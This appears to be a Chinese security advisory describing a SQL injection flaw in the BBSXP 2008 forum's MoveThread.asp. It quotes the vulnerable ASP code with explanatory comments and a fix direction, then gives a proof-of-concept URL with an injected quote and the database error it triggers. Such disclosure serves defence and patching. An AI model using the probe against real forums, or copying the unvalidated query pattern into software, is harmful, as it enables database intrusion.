BBSxp 2008 MoveThread.asp页面SQL注入漏洞

漏洞版本:

Build: 8.0.4
漏洞描述:

BBSXP为一款简单的ASP+SQL与ACCESS开发的多风格论坛，目前最新版本为BBSXP2008。漏洞文件:MoveThread.asp
MoveThread.asp 第2-24行:
<%
' Excerpt from MoveThread.asp as quoted by the advisory. It requires a login
' cookie, reads the ThreadID request value, checks that each listed thread
' exists, and then looks up the ForumID of the first thread.
' Execute and error are helpers defined elsewhere in the application
' (presumably BBSXP_Class.asp, which the reported error names - confirm).
if CookieUserName =empty then error("δ<a href=""javascript:BBSXP_Modal.Open ('Login.asp',380,170);"">¼</a>̳") ' login check: CookieUserName must be set, otherwise show the Login.asp link

' Request("name") without a named collection searches QueryString, Form and
' Cookies, so this value is fully client-controlled.
ThreadID=Request("ThreadID") ' SQL injection source: no validation is applied to the raw value here

' A value that is not a single number is treated as a comma-separated list.
If Not IsNumeric(ThreadID) then
ThreadIDArray=Split(ThreadID,",") ' split the list on commas; the elements are still unvalidated strings
' Split always returns an array, so the Else branch below looks unreachable.
if IsArray(ThreadIDArray) then
for i=0 to Ubound(ThreadIDArray)
' Injection sink: each element is concatenated into the SQL text as-is, with no
' IsNumeric check or int() conversion, so any non-numeric element becomes part
' of the statement. Fix direction: reject the request unless every element
' passes IsNumeric (or convert each with int/CLng) before building the query,
' or bind the value through an ADODB.Command parameter.
if Execute ("Select ThreadID from ["&TablePrefix&"Threads] where ThreadID="& ThreadIDArray(i)&"").eof then error"<li>ϵͳڸӵ"
next
' Only the first element is converted with int(), and only after the loop
' above has already run a query for every element.
ThreadIDSql=int(ThreadIDArray(0))
else
error("")
end if
Else
ThreadIDSql=int(ThreadID)
End If

' This query uses ThreadIDSql, which has been through int() on both paths.
ForumID=Execute("Select ForumID From ["&TablePrefix&"Threads] where ThreadID="&ThreadIDSql&"")(0)
%>
<!-- #include file="Utility/ForumPermissions.asp" -->
执行此查询后才判断权限，普通用户即可进行sql注入。
Urlhttp://www.target.com/movethread.asp?ThreadID=1,1'
提交后返回错误信息:

Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'ThreadID=1'' 中。

/BBSXP_Class.asp，行 5

 <* 参考
 Tr4c3[at]126[dot]Com
 *>